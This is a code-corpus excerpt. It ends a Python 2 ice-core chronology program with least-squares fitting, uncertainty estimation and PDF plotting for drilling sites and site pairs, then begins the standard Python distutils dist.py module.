(self.correlation_corr_a_before!=self.correlation_corr_a).any(): self.chol_a=cholesky(self.correlation_corr_a) if (self.correlation_corr_LID_before!=self.correlation_corr_LID).any(): self.chol_LID=cholesky(self.correlation_corr_LID) if (self.correlation_corr_a_before!=self.correlation_corr_a).any(): self.chol_tau=cholesky(self.correlation_corr_tau) #Accu corr=np.dot(self.chol_a,self.corr_a)*self.sigmap_corr_a self.a=self.a_model*np.exp(np.interp(self.age_model[:-1], self.corr_a_age, corr)) #FIXME: we should use mid-age and not age #Thinning 
self.tau=self.tau_model*np.exp(np.interp(self.depth_mid, self.corr_tau_depth, np.dot(self.chol_tau,self.corr_tau)*self.sigmap_corr_tau)) self.udepth=self.udepth_top+np.cumsum(np.concatenate((np.array([0]), self.D/self.tau*self.depth_inter))) corr=np.dot(self.chol_LID,self.corr_LID)*self.sigmap_corr_LID self.LID=self.LID_model*np.exp(np.interp(self.age_model, self.corr_LID_age, corr)) self.LIDIE=self.LID*self.Dfirn self.ULIDIE=np.interp(self.LIDIE, self.iedepth, self.udepth) #Ice age self.icelayerthick=self.tau*self.a/self.D self.age=self.age_top+np.cumsum(np.concatenate((np.array([0]), self.D/self.tau/self.a*self.depth_inter))) self.ice_equiv_depth=np.interp(self.udepth-self.ULIDIE, self.udepth, self.depth) self.Ddepth=self.depth-self.ice_equiv_depth self.airage=np.interp(self.ice_equiv_depth, self.depth,self.age, left=np.nan, right=np.nan) self.airlayerthick=1/np.diff(self.airage) def model(self, variables): index=0 # if self.calc_a==True: # self.A0=variables[index] # self.beta=variables[index+1] # index=index+2 # if self.calc_tau==True: ## self.p=-1+m.exp(variables[index]) ## self.s=variables[index+1] ## self.mu=variables[index+2] ## index=index+3 # self.pprime=variables[index] # self.muprime=variables[index+1] # index=index+2 self.corr_tau=variables[index:index+np.size(self.corr_tau)] self.corr_a=variables[index+np.size(self.corr_tau):index+np.size(self.corr_tau)+np.size(self.corr_a)] self.corr_LID=variables[index+np.size(self.corr_tau)+np.size(self.corr_a):index+np.size(self.corr_tau)+np.size(self.corr_a)+np.size(self.corr_LID)] ##Raw model self.raw_model() ##Corrected model self.corrected_model() return np.concatenate((self.age,self.airage,self.Ddepth,self.a,self.tau,self.LID,self.icelayerthick,self.airlayerthick)) def write_init(self): self.a_init=self.a self.LID_init=self.LID self.tau_init=self.tau self.icelayerthick_init=self.icelayerthick self.airlayerthick_init=self.airlayerthick self.age_init=self.age self.airage_init=self.airage 
self.Ddepth_init=self.Ddepth def fct_age(self, depth): return np.interp(depth, self.depth, self.age) def fct_age_init(self, depth): return np.interp(depth, self.depth, self.age_init) def fct_age_model(self, depth): return np.interp(depth, self.depth,self.age_model) def fct_airage(self, depth): return np.interp(depth, self.depth, self.airage) def fct_airage_init(self, depth): return np.interp(depth, self.depth, self.airage_init) def fct_airage_model(self, depth): return np.interp(depth, self.depth, self.airage_model) def fct_Ddepth(self, depth): return np.interp(depth, self.depth, self.Ddepth) def residuals(self, variables): self.model(variables) resi_corr_a=self.corr_a resi_corr_LID=self.corr_LID resi_corr_tau=self.corr_tau resi_age=(self.fct_age(self.icemarkers_depth)-self.icemarkers_age)/self.icemarkers_sigma if np.size(self.icemarkers_depth)>0: resi_age=scipy.linalg.lu_solve(self.icemarkers_lu_piv,resi_age) resi_airage=(self.fct_airage(self.airmarkers_depth)-self.airmarkers_age)/self.airmarkers_sigma if np.size(self.airmarkers_depth)>0: resi_airage=scipy.linalg.lu_solve(self.airmarkers_lu_piv,resi_airage) resi_iceint=(self.fct_age(self.iceintervals_depthbot)-self.fct_age(self.iceintervals_depthtop)-self.iceintervals_duration)/self.iceintervals_sigma if np.size(self.iceintervals_depthtop)>0: resi_iceint=scipy.linalg.lu_solve(self.iceintervals_lu_piv,resi_iceint) resi_airint=(self.fct_airage(self.airintervals_depthbot)-self.fct_airage(self.airintervals_depthtop)-self.airintervals_duration)/self.airintervals_sigma if np.size(self.airintervals_depthtop)>0: resi_airint=scipy.linalg.lu_solve(self.airintervals_lu_piv,resi_airint) resi_Ddepth=(self.fct_Ddepth(self.Ddepth_depth)-self.Ddepth_Ddepth)/self.Ddepth_sigma if np.size(self.Ddepth_depth)>0: resi_Ddepth=scipy.linalg.lu_solve(self.Ddepth_lu_piv,resi_Ddepth) return np.concatenate((resi_corr_a, resi_corr_LID, resi_corr_tau, resi_age,resi_airage, resi_iceint, resi_airint, resi_Ddepth)) def cost_function(self): 
cost=np.dot(self.residuals,np.transpose(self.residuals)) return cost def jacobian(self): epsilon=np.sqrt(np.diag(self.hess))/100000000. model0=self.model(self.variables) jacob=np.empty((np.size(model0), np.size(self.variables))) for i in np.arange(np.size(self.variables)): var=self.variables+0 var[i]=var[i]+epsilon[i] model1=self.model(var) jacob[:,i]=(model1-model0)/epsilon[i] model0=self.model(self.variables) return jacob def optimisation(self) : self.variables,self.hess,self.infodict,mesg,ier=leastsq(self.residuals, self.variables, full_output=1) print self.variables print self.hess return self.variables, self.hess def sigma(self): jacob=self.jacobian() index=0 c_model=np.dot(jacob[index:index+np.size(self.age),:],np.dot(self.hess,np.transpose(jacob[index:index+np.size(self.age),:]))) self.sigma_age=np.sqrt(np.diag(c_model)) index=index+np.size(self.age) c_model=np.dot(jacob[index:index+np.size(self.airage),:],np.dot(self.hess,np.transpose(jacob[index:index+np.size(self.airage),:]))) self.sigma_airage=np.sqrt(np.diag(c_model)) index=index+np.size(self.airage) c_model=np.dot(jacob[index:index+np.size(self.Ddepth),:],np.dot(self.hess,np.transpose(jacob[index:index+np.size(self.Ddepth),:]))) self.sigma_Ddepth=np.sqrt(np.diag(c_model)) index=index+np.size(self.Ddepth) c_model=np.dot(jacob[index:index+np.size(self.a),:],np.dot(self.hess,np.transpose(jacob[index:index+np.size(self.a),:]))) self.sigma_a=np.sqrt(np.diag(c_model)) index=index+np.size(self.a) c_model=np.dot(jacob[index:index+np.size(self.tau),:],np.dot(self.hess,np.transpose(jacob[index:index+np.size(self.tau),:]))) self.sigma_tau=np.sqrt(np.diag(c_model)) index=index+np.size(self.tau) c_model=np.dot(jacob[index:index+np.size(self.LID),:],np.dot(self.hess,np.transpose(jacob[index:index+np.size(self.LID),:]))) self.sigma_LID=np.sqrt(np.diag(c_model)) index=index+np.size(self.LID) 
c_model=np.dot(jacob[index:index+np.size(self.icelayerthick),:],np.dot(self.hess,np.transpose(jacob[index:index+np.size(self.icelayerthick),:]))) self.sigma_icelayerthick=np.sqrt(np.diag(c_model)) index=index+np.size(self.icelayerthick) c_model=np.dot(jacob[index:index+np.size(self.airlayerthick),:],np.dot(self.hess,np.transpose(jacob[index:index+np.size(self.airlayerthick),:]))) self.sigma_airlayerthick=np.sqrt(np.diag(c_model)) self.sigma_a_model=np.interp((self.age_model[1:]+self.age_model[:-1])/2, self.corr_a_age, self.sigmap_corr_a) self.sigma_LID_model=np.interp(self.age_model, self.corr_LID_age, self.sigmap_corr_LID) self.sigma_tau_model=np.interp(self.depth_mid, self.corr_tau_depth, self.sigmap_corr_tau) def sigma_zero(self): self.sigma_age=np.zeros_like(self.age) self.sigma_airage=np.zeros_like(self.airage) self.sigma_Ddepth=np.zeros_like(self.Ddepth) self.sigma_a=np.zeros_like(self.a) self.sigma_tau=np.zeros_like(self.tau) self.sigma_LID=np.zeros_like(self.LID) self.sigma_icelayerthick=np.zeros_like(self.icelayerthick) self.sigma_airlayerthick=np.zeros_like(self.airlayerthick) self.sigma_a_model=np.interp((self.age_model[1:]+self.age_model[:-1])/2, self.corr_a_age, self.sigmap_corr_a) self.sigma_LID_model=np.interp(self.age_model, self.corr_LID_age, self.sigmap_corr_LID) self.sigma_tau_model=np.interp(self.depth_mid, self.corr_tau_depth, self.sigmap_corr_tau) def figures(self): mpl.figure(self.label+' thinning') mpl.title(self.label+' thinning') mpl.xlabel('Thinning') mpl.ylabel('Depth') if show_initial: mpl.plot(self.tau_init, self.depth_mid, color=color_init, label='Initial') mpl.plot(self.tau_model, self.depth_mid, color=color_mod, label='Prior') mpl.plot(self.tau, self.depth_mid, color=color_opt, label='Posterior +/-$\sigma$') mpl.fill_betweenx(self.depth_mid, self.tau-self.sigma_tau, self.tau+self.sigma_tau, color=color_ci) # mpl.plot(self.tau+self.sigma_tau, self.depth_mid, color='k', linestyle='-', label='+/- 1 sigma') # 
mpl.plot(self.tau-self.sigma_tau, self.depth_mid, color='k', linestyle='-') x1,x2,y1,y2 = mpl.axis() mpl.axis((x1,x2,self.depth[-1],self.depth[0])) mpl.legend(loc="best") pp=PdfPages(datadir+self.label+'/thinning.pdf') pp.savefig(mpl.figure(self.label+' thinning')) pp.close() if not show_figures: mpl.close() mpl.figure(self.label+' ice layer thickness') mpl.title(self.label+' ice layer thickness') mpl.xlabel('thickness of annual layers (m/yr)') mpl.ylabel('Depth') if show_initial: mpl.plot(self.icelayerthick_init, self.depth_mid, color=color_init, label='Initial') # for i in range(np.size(self.iceintervals_duration)): # y1=self.iceintervals_depthtop[i] # y2=self.iceintervals_depthbot[i] # x1=(y2-y1)/(self.iceintervals_duration[i]+self.iceintervals_sigma[i]) # x2=(y2-y1)/(self.iceintervals_duration[i]-self.iceintervals_sigma[i]) # yserie=np.array([y1,y1,y2,y2,y1]) # xserie=np.array([x1,x2,x2,x1,x1]) # if i==0: # mpl.plot(xserie,yserie, color=color_obs, label="observations") # else: # mpl.plot(xserie,yserie, color=color_obs) mpl.plot(self.icelayerthick_model, self.depth_mid, color=color_mod, label='Prior') mpl.plot(self.icelayerthick, self.depth_mid, color=color_opt, label='Posterior +/-$\sigma$') mpl.fill_betweenx(self.depth_mid, self.icelayerthick-self.sigma_icelayerthick, self.icelayerthick+self.sigma_icelayerthick, color=color_ci) x1,x2,y1,y2 = mpl.axis() mpl.axis((0,x2,self.depth[-1],self.depth[0])) mpl.legend(loc="best") pp=PdfPages(datadir+self.label+'/icelayerthick.pdf') pp.savefig(mpl.figure(self.label+' ice layer thickness')) pp.close() if not show_figures: mpl.close() mpl.figure(self.label+' air layer thickness') mpl.title(self.label+' air layer thickness') mpl.xlabel('thickness of annual layers (m/yr)') mpl.ylabel('Depth') if show_initial: mpl.plot(self.airlayerthick_init, self.depth_mid, color=color_init, label='Initial') # for i in range(np.size(self.airintervals_duration)): # y1=self.airintervals_depthtop[i] # y2=self.airintervals_depthbot[i] # 
x1=(y2-y1)/(self.airintervals_duration[i]+self.airintervals_sigma[i]) # x2=(y2-y1)/(self.airintervals_duration[i]-self.airintervals_sigma[i]) # yserie=np.array([y1,y1,y2,y2,y1]) # xserie=np.array([x1,x2,x2,x1,x1]) # if i==0: # mpl.plot(xserie,yserie, color=color_obs, label='observations') # else: # mpl.plot(xserie,yserie, color=color_obs) mpl.plot(self.airlayerthick_model, self.depth_mid, color=color_mod, label='Prior') mpl.plot(self.airlayerthick, self.depth_mid, color=color_opt, label='Posterior +/-$\sigma$') mpl.fill_betweenx(self.depth_mid, self.airlayerthick-self.sigma_airlayerthick, self.airlayerthick+self.sigma_airlayerthick, color=color_ci) x1,x2,y1,y2 = mpl.axis() mpl.axis((0, 2*max(self.icelayerthick),self.depth[-1],self.depth[0])) mpl.legend(loc="best") pp=PdfPages(datadir+self.label+'/airlayerthick.pdf') if show_airlayerthick: pp.savefig(mpl.figure(self.label+' air layer thickness')) #Fixme: buggy line on anaconda pp.close() if not show_figures: mpl.close() mpl.figure(self.label+' accumulation') mpl.title(self.label+' accumulation') mpl.xlabel('Optimized age (yr)') mpl.ylabel('Accumulation (m/yr)') if show_initial: mpl.step(self.age, np.concatenate((self.a_init, np.array([self.a_init[-1]]))), color=color_init, where='post', label='Initial') mpl.step(self.age, np.concatenate((self.a_model, np.array([self.a_model[-1]]))), color=color_mod, where='post', label='Prior') mpl.step(self.age, np.concatenate((self.a, np.array([self.a[-1]]))), color=color_opt, where='post', label='Posterior +/-$\sigma$') mpl.fill_between(self.age[:-1], self.a-self.sigma_a, self.a+self.sigma_a, color=color_ci) x1,x2,y1,y2 = mpl.axis() mpl.axis((self.age_top,x2,y1,y2)) mpl.legend(loc="best") pp=PdfPages(datadir+self.label+'/accumulation.pdf') pp.savefig(mpl.figure(self.label+' accumulation')) pp.close() if not show_figures: mpl.close() mpl.figure(self.label+' LID') mpl.title(self.label+' LID') mpl.xlabel('Optimized age (yr)') mpl.ylabel('LID') if show_initial: mpl.plot(self.age, 
self.LID_init, color=color_init, label='Initial') mpl.plot(self.age, self.LID_model, color=color_mod, label='Prior') mpl.plot(self.age, self.LID, color=color_opt, label='Posterior +/-$\sigma$') mpl.fill_between(self.age, self.LID-self.sigma_LID, self.LID+self.sigma_LID, color=color_ci) x1,x2,y1,y2 = mpl.axis() mpl.axis((self.age_top,x2,y1,y2)) mpl.legend(loc="best") pp=PdfPages(datadir+self.label+'/LID.pdf') pp.savefig(mpl.figure(self.label+' LID')) pp.close() if not show_figures: mpl.close() mpl.figure(self.label+' ice age') mpl.title(self.label+' ice age') mpl.xlabel('age (yr b1950)') mpl.ylabel('depth (m)') if show_initial: mpl.plot(self.age_init, self.depth, color=color_init, label='Initial') if (np.size(self.icemarkers_depth)>0): mpl.errorbar(self.icemarkers_age, self.icemarkers_depth, color=color_obs, xerr=self.icemarkers_sigma, linestyle='', marker='o', markersize=2, label="dated horizons") # mpl.ylim(mpl.ylim()[::-1]) for i in range(np.size(self.iceintervals_duration)): y1=self.iceintervals_depthtop[i] y2=self.iceintervals_depthbot[i] x1=self.fct_age(y1) #(y2-y1)/(self.iceintervals_duration[i]+self.iceintervals_sigma[i]) x2=x1+self.iceintervals_duration[i] #(y2-y1)/(self.iceintervals_duration[i]-self.iceintervals_sigma[i]) xseries=np.array([x1,x2,x2,x1,x1]) yseries=np.array([y1,y1,y2,y2,y1]) if i==0: mpl.plot(xseries, yseries, color=color_di, label="dated intervals") mpl.errorbar(x2, y2, color=color_di, xerr=self.iceintervals_sigma[i], capsize=1) else: mpl.plot(xseries, yseries, color=color_di) mpl.errorbar(x2, y2, color=color_di, xerr=self.iceintervals_sigma[i], capsize=1) # mpl.arrow(x1, y1, x2-x1, y2-y1, fc=color_di, ec=color_di, head_width=0.02, head_length=0.05) # if (np.size(self.iceintervals_depthtop)>0): # mpl.errorbar(self.fct_age(self.iceintervals_depthtop)+self.iceintervals_duration, self.iceintervals_depthbot, color=color_di, xerr=self.iceintervals_sigma, linestyle='', marker='o', markersize='2', label="dated intervals") mpl.plot(self.age_model, 
self.depth, color=color_mod, label='Prior') mpl.plot(self.age, self.depth, color=color_opt, label='Posterior +/-$\sigma$') mpl.fill_betweenx(self.depth, self.age-self.sigma_age, self.age+self.sigma_age , color=color_ci) # mpl.plot(self.age-self.sigma_age, self.depth, color='k', linestyle='-') mpl.plot(self.sigma_age*scale_ageci, self.depth, color=color_sigma, label='$\sigma$ x'+str(scale_ageci)) x1,x2,y1,y2 = mpl.axis() mpl.axis((self.age_top,x2,self.depth[-1],self.depth[0])) mpl.legend(loc="best") pp=PdfPages(datadir+self.label+'/ice_age.pdf') pp.savefig(mpl.figure(self.label+' ice age')) pp.close() if not show_figures: mpl.close() mpl.figure(self.label+' air age') mpl.title(self.label+' air age') mpl.xlabel('age (yr b1950)') mpl.ylabel('depth (m)') if show_initial: mpl.plot(self.airage_init, self.depth, color=color_init, label='Initial') if (np.size(self.airmarkers_depth)>0): mpl.errorbar(self.airmarkers_age, self.airmarkers_depth, color=color_obs, xerr=self.airmarkers_sigma, linestyle='', marker='o', markersize=2, label="observations") # mpl.ylim(mpl.ylim()[::-1]) for i in range(np.size(self.airintervals_duration)): y1=self.airintervals_depthtop[i] y2=self.airintervals_depthbot[i] x1=self.fct_airage(y1) #(y2-y1)/(self.iceintervals_duration[i]+self.iceintervals_sigma[i]) x2=x1+self.airintervals_duration[i] #(y2-y1)/(self.iceintervals_duration[i]-self.iceintervals_sigma[i]) xseries=np.array([x1,x2,x2,x1,x1]) yseries=np.array([y1,y1,y2,y2,y1]) if i==0: mpl.plot(xseries, yseries, color=color_di, label="dated intervals") mpl.errorbar(x2, y2, color=color_di, xerr=self.airintervals_sigma[i], capsize=1) else: mpl.plot(xseries, yseries, color=color_di) mpl.errorbar(x2, y2, color=color_di, xerr=self.airintervals_sigma[i], capsize=1) mpl.plot(self.airage_model, self.depth, color=color_mod, label='Prior') mpl.fill_betweenx(self.depth, self.airage-self.sigma_airage, self.airage+self.sigma_airage , color=color_ci) mpl.plot(self.airage, self.depth, color=color_opt, 
label='Posterior +/-$\sigma$') # mpl.plot(self.airage+self.sigma_airage, self.depth, color='k', linestyle='-', label='+/- 1 sigma') # mpl.plot(self.airage-self.sigma_airage, self.depth, color='k', linestyle='-') mpl.plot(self.sigma_airage*scale_ageci, self.depth, color=color_sigma, label='$\sigma$ x'+str(scale_ageci)) x1,x2,y1,y2 = mpl.axis() mpl.axis((self.age_top,x2,self.depth[-1],self.depth[0])) mpl.legend(loc="best") pp=PdfPages(datadir+self.label+'/air_age.pdf') pp.savefig(mpl.figure(self.label+' air age')) pp.close() if not show_figures: mpl.close() mpl.figure(self.label+' Ddepth') mpl.title(self.label+' $\Delta$depth') mpl.xlabel('$\Delta$depth (m)') mpl.ylabel('Air depth (m)') if show_initial: mpl.plot(self.Ddepth_init, self.depth, color=color_init, label='Initial') if (np.size(self.Ddepth_depth)>0): mpl.errorbar(self.Ddepth_Ddepth, self.Ddepth_depth, color=color_obs, xerr=self.Ddepth_sigma, linestyle='', marker='o', markersize=2, label="observations") # mpl.ylim(mpl.ylim()[::-1]) mpl.plot(self.Ddepth_model, self.depth, color=color_mod, label='Prior') mpl.plot(self.Ddepth, self.depth, color=color_opt, label='Posterior +/-$\sigma$') mpl.fill_betweenx(self.depth, self.Ddepth-self.sigma_Ddepth, self.Ddepth+self.sigma_Ddepth, color=color_ci) # mpl.plot(self.Ddepth+self.sigma_Ddepth, self.depth, color='k', linestyle='-', label='+/- 1 sigma') # mpl.plot(self.Ddepth-self.sigma_Ddepth, self.depth, color='k', linestyle='-') x1,x2,y1,y2 = mpl.axis() mpl.axis((x1,x2,self.depth[-1],self.depth[0])) mpl.legend(loc="best") pp=PdfPages(datadir+self.label+'/Ddepth.pdf') pp.savefig(mpl.figure(self.label+' Ddepth')) pp.close() if not show_figures: mpl.close() def save(self): output=np.vstack((self.depth,self.age,self.sigma_age,self.airage,self.sigma_airage,np.append(self.a,self.a[-1]),np.append(self.sigma_a,self.sigma_a[-1]),np.append(self.tau,self.tau[-1]),np.append(self.sigma_tau,self.sigma_tau[-1]),self.LID,self.sigma_LID, 
self.Ddepth,self.sigma_Ddepth,np.append(self.a_model,self.a_model[-1]),np.append(self.sigma_a_model,self.sigma_a_model[-1]),np.append(self.tau_model,self.tau_model[-1]),np.append(self.sigma_tau_model,self.sigma_tau_model[-1]),self.LID_model,self.sigma_LID_model,np.append(self.icelayerthick,self.icelayerthick[-1]),np.append(self.sigma_icelayerthick,self.sigma_icelayerthick[-1]),np.append(self.airlayerthick,self.airlayerthick[-1]),np.append(self.sigma_airlayerthick,self.sigma_airlayerthick[-1]))) with open(datadir+self.label+'/output.txt','w') as f: f.write('#depth\tage\tsigma_age\tair_age\tsigma_air_age\taccu\tsigma_accu\tthinning\tsigma_thinning\tLID\tsigma_LID\tDdepth\tsigma_Ddepth\taccu_model\tsigma_accu_model\tthinning_model\tsigma_thinning_model\tLID_model\tsigma_LID_model\ticelayerthick\tsigma_icelayerthick\tairlayerthick\tsigma_airlayerthick\n') np.savetxt(f,np.transpose(output), delimiter='\t') np.savetxt(datadir+self.label+'/restart.txt',np.transpose(self.variables)) # def udepth_save(self): # np.savetxt(datadir+self.label+'/udepth.txt',self.udepth) class DrillingPair: def __init__(self, D1, D2): self.D1=D1 self.D2=D2 def init(self): self.label=self.D1.label+'-'+self.D2.label # print 'Initialization of drilling pair ',self.label #TODO: allow to have either dlabel1+'-'dlabel2 or dlbel2+'-'dlabel1 as directory filename=datadir+self.D1.label+'-'+self.D2.label+'/ice_depth.txt' if os.path.isfile(filename) and open(filename).read(): readarray=np.loadtxt(filename) self.iceicemarkers_depth1=readarray[:,0] self.iceicemarkers_depth2=readarray[:,1] self.iceicemarkers_sigma=readarray[:,2] else: self.iceicemarkers_depth1=np.array([]) self.iceicemarkers_depth2=np.array([]) self.iceicemarkers_sigma=np.array([]) filename=datadir+self.D1.label+'-'+self.D2.label+'/air_depth.txt' if os.path.isfile(filename) and open(filename).read(): readarray=np.loadtxt(filename) self.airairmarkers_depth1=readarray[:,0] self.airairmarkers_depth2=readarray[:,1] 
self.airairmarkers_sigma=readarray[:,2] else: self.airairmarkers_depth1=np.array([]) self.airairmarkers_depth2=np.array([]) self.airairmarkers_sigma=np.array([]) filename=datadir+self.D1.label+'-'+self.D2.label+'/iceair_depth.txt' if os.path.isfile(filename) and open(filename).read(): readarray=np.loadtxt(filename) self.iceairmarkers_depth1=readarray[:,0] self.iceairmarkers_depth2=readarray[:,1] self.iceairmarkers_sigma=readarray[:,2] else: self.iceairmarkers_depth1=np.array([]) self.iceairmarkers_depth2=np.array([]) self.iceairmarkers_sigma=np.array([]) filename=datadir+self.D1.label+'-'+self.D2.label+'/airice_depth.txt' if os.path.isfile(filename) and open(filename).read(): readarray=np.loadtxt(filename) self.airicemarkers_depth1=readarray[:,0] self.airicemarkers_depth2=readarray[:,1] self.airicemarkers_sigma=readarray[:,2] else: self.airicemarkers_depth1=np.array([]) self.airicemarkers_depth2=np.array([]) self.airicemarkers_sigma=np.array([]) self.iceicemarkers_correlation=np.diag(np.ones(np.size(self.iceicemarkers_depth1))) self.airairmarkers_correlation=np.diag(np.ones(np.size(self.airairmarkers_depth1))) self.iceairmarkers_correlation=np.diag(np.ones(np.size(self.iceairmarkers_depth1))) self.airicemarkers_correlation=np.diag(np.ones(np.size(self.airicemarkers_depth1))) filename=datadir+'/parameters-CovarianceObservations-AllDrillingPairs.py' if os.path.isfile(filename): execfile(filename) filename=datadir+self.label+'/parameters-CovarianceObservations.py' if os.path.isfile(filename): execfile(filename) if np.size(self.iceicemarkers_depth1)>0: self.iceicemarkers_chol=cholesky(self.iceicemarkers_correlation) self.iceicemarkers_lu_piv=scipy.linalg.lu_factor(self.iceicemarkers_chol) if np.size(self.airairmarkers_depth1)>0: self.airairmarkers_chol=cholesky(self.airairmarkers_correlation) self.airairmarkers_lu_piv=scipy.linalg.lu_factor(self.airairmarkers_chol) if np.size(self.iceairmarkers_depth1)>0: self.iceairmarkers_chol=cholesky(self.iceairmarkers_correlation) 
self.iceairmarkers_lu_piv=scipy.linalg.lu_factor(self.iceairmarkers_chol) if np.size(self.airicemarkers_depth1)>0: self.airicemarkers_chol=cholesky(self.airicemarkers_correlation) self.airicemarkers_lu_piv=scipy.linalg.lu_factor(self.airicemarkers_chol) def residuals(self): resi_iceice=(self.D1.fct_age(self.iceicemarkers_depth1)-self.D2.fct_age(self.iceicemarkers_depth2))/self.iceicemarkers_sigma if np.size(self.iceicemarkers_depth1)>0: resi_iceice=scipy.linalg.lu_solve(self.iceicemarkers_lu_piv,resi_iceice) resi_airair=(self.D1.fct_airage(self.airairmarkers_depth1)-self.D2.fct_airage(self.airairmarkers_depth2))/self.airairmarkers_sigma if np.size(self.airairmarkers_depth1)>0: resi_airair=scipy.linalg.lu_solve(self.airairmarkers_lu_piv,resi_airair) resi_iceair=(self.D1.fct_age(self.iceairmarkers_depth1)-self.D2.fct_airage(self.iceairmarkers_depth2))/self.iceairmarkers_sigma if np.size(self.iceairmarkers_depth1)>0: resi_iceair=scipy.linalg.lu_solve(self.iceairmarkers_lu_piv,resi_iceair) resi_airice=(self.D1.fct_airage(self.airicemarkers_depth1)-self.D2.fct_age(self.airicemarkers_depth2))/self.airicemarkers_sigma if np.size(self.airicemarkers_depth1)>0: resi_airice=scipy.linalg.lu_solve(self.airicemarkers_lu_piv,resi_airice) resi=np.concatenate((resi_iceice,resi_airair,resi_iceair,resi_airice)) return resi def figures(self): if not os.path.isdir(datadir+self.label): os.mkdir(datadir+self.label) mpl.figure(self.label+' ice-ice') mpl.xlabel(self.D1.label+' ice age (yr b1950)') mpl.ylabel(self.D2.label+' ice age (yr b1950)') if (np.size(self.iceicemarkers_depth1)>0): if show_initial: mpl.errorbar(self.D1.fct_age_init(self.iceicemarkers_depth1),self.D2.fct_age_init(self.iceicemarkers_depth2), color=color_init, xerr=self.iceicemarkers_sigma, linestyle='', marker='o', markersize=2, label="Initial") mpl.errorbar(self.D1.fct_age_model(self.iceicemarkers_depth1),self.D2.fct_age_model(self.iceicemarkers_depth2), color=color_mod, xerr=self.iceicemarkers_sigma, linestyle='', 
marker='o', markersize=2, label="Prior") mpl.errorbar(self.D1.fct_age(self.iceicemarkers_depth1),self.D2.fct_age(self.iceicemarkers_depth2), color=color_opt, xerr=self.iceicemarkers_sigma, linestyle='', marker='o', markersize=2, label="Posterior") x1,x2,y1,y2 = mpl.axis() x1=self.D1.age_top y1=self.D2.age_top mpl.axis((x1,x2,y1,y2)) range=np.array([max(x1,y1),min(x2,y2)]) mpl.plot(range,range, color=color_obs, label='perfect agreement') mpl.legend(loc="best") pp=PdfPages(datadir+self.label+'/ice-ice.pdf') pp.savefig(mpl.figure(self.label+' ice-ice')) pp.close() if not show_figures: mpl.close() mpl.figure(self.label+' air-air') mpl.xlabel(self.D1.label+' air age (yr b1950)') mpl.ylabel(self.D2.label+' air age (yr b1950)') if (np.size(self.airairmarkers_depth1)>0): if show_initial: mpl.errorbar(self.D1.fct_airage_init(self.airairmarkers_depth1),self.D2.fct_airage_init(self.airairmarkers_depth2), color=color_init, xerr=self.airairmarkers_sigma, linestyle='', marker='o', markersize=2, label="Initial") mpl.errorbar(self.D1.fct_airage_model(self.airairmarkers_depth1),self.D2.fct_airage_model(self.airairmarkers_depth2), color=color_mod, xerr=self.airairmarkers_sigma, linestyle='', marker='o', markersize=2, label="Prior") mpl.errorbar(self.D1.fct_airage(self.airairmarkers_depth1),self.D2.fct_airage(self.airairmarkers_depth2), color=color_opt, xerr=self.airairmarkers_sigma, linestyle='', marker='o', markersize=2, label="Posterior") x1,x2,y1,y2 = mpl.axis() x1=self.D1.age_top y1=self.D2.age_top mpl.axis((x1,x2,y1,y2)) range=np.array([max(x1,y1),min(x2,y2)]) mpl.plot(range,range, color=color_obs, label='perfect agreement') mpl.legend(loc="best") pp=PdfPages(datadir+self.label+'/air-air.pdf') pp.savefig(mpl.figure(self.label+' air-air')) pp.close() if not show_figures: mpl.close() mpl.figure(self.label+' ice-air') mpl.xlabel(self.D1.label+' ice age (yr b1950)') mpl.ylabel(self.D2.label+' air age (yr b1950)') if (np.size(self.iceairmarkers_depth1)>0): if show_initial: 
mpl.errorbar(self.D1.fct_age_init(self.iceairmarkers_depth1),self.D2.fct_airage_init(self.iceairmarkers_depth2), color=color_init, xerr=self.iceairmarkers_sigma, linestyle='', marker='o', markersize=2, label="Initial") mpl.errorbar(self.D1.fct_age_model(self.iceairmarkers_depth1),self.D2.fct_airage_model(self.iceairmarkers_depth2), color=color_mod, xerr=self.iceairmarkers_sigma, linestyle='', marker='o', markersize=2, label="Prior") mpl.errorbar(self.D1.fct_age(self.iceairmarkers_depth1),self.D2.fct_airage(self.iceairmarkers_depth2), color=color_opt, xerr=self.iceairmarkers_sigma, linestyle='', marker='o', markersize=2, label="Posterior") x1,x2,y1,y2 = mpl.axis() x1=self.D1.age_top y1=self.D2.age_top mpl.axis((x1,x2,y1,y2)) range=np.array([max(x1,y1),min(x2,y2)]) mpl.plot(range,range, color=color_obs, label='perfect agreement') mpl.legend(loc="best") pp=PdfPages(datadir+self.label+'/ice-air.pdf') pp.savefig(mpl.figure(self.label+' ice-air')) pp.close() if not show_figures: mpl.close() mpl.figure(self.label+' air-ice') mpl.xlabel(self.D1.label+' air age (yr b1950)') mpl.ylabel(self.D2.label+' ice age (yr b1950)') if (np.size(self.airicemarkers_depth1)>0): if show_initial: mpl.errorbar(self.D1.fct_airage_init(self.airicemarkers_depth1),self.D2.fct_age_init(self.airicemarkers_depth2), color=color_init, xerr=self.airicemarkers_sigma, linestyle='', marker='o', markersize=2, label="Initial") mpl.errorbar(self.D1.fct_airage_model(self.airicemarkers_depth1),self.D2.fct_age_model(self.airicemarkers_depth2), color=color_mod, xerr=self.airicemarkers_sigma, linestyle='', marker='o', markersize=2, label="Prior") mpl.errorbar(self.D1.fct_airage(self.airicemarkers_depth1),self.D2.fct_age(self.airicemarkers_depth2), color=color_opt, xerr=self.airicemarkers_sigma, linestyle='', marker='o', markersize=2, label="Posterior") x1,x2,y1,y2 = mpl.axis() x1=self.D1.age_top y1=self.D2.age_top mpl.axis((x1,x2,y1,y2)) range=np.array([max(x1,y1),min(x2,y2)]) mpl.plot(range,range, 
color=color_obs, label='perfect agreement') mpl.legend(loc="best") pp=PdfPages(datadir+self.label+'/air-ice.pdf') pp.savefig(mpl.figure(self.label+' air-ice')) pp.close() if not show_figures: mpl.close()
mit
OptimusGitEtna/RestSymf
Python-3.4.2/Lib/distutils/dist.py
85
49786
"""distutils.dist Provides the Distribution class, which represents the module distribution being built/installed/distributed. """ import sys, os, re from email import message_from_file try: import warnings except ImportError: warnings = None from distutils.errors import * from distutils.fancy_getopt import FancyGetopt, translate_longopt from distutils.util import check_environ, strtobool, rfc822_escape from distutils import log from distutils.debug import DEBUG # Regex to define acceptable Distutils command names. This is not *quite* # the same as a Python NAME -- I don't allow leading underscores. The fact # that they're very similar is no coincidence; the default naming scheme is # to look for a Python module named after the command. command_re = re.compile (r'^[a-zA-Z]([a-zA-Z0-9_]*)$') class Distribution: """The core of the Distutils. Most of the work hiding behind 'setup' is really done within a Distribution instance, which farms the work out to the Distutils commands specified on the command line. Setup scripts will almost never instantiate Distribution directly, unless the 'setup()' function is totally inadequate to their needs. However, it is conceivable that a setup script might wish to subclass Distribution for some 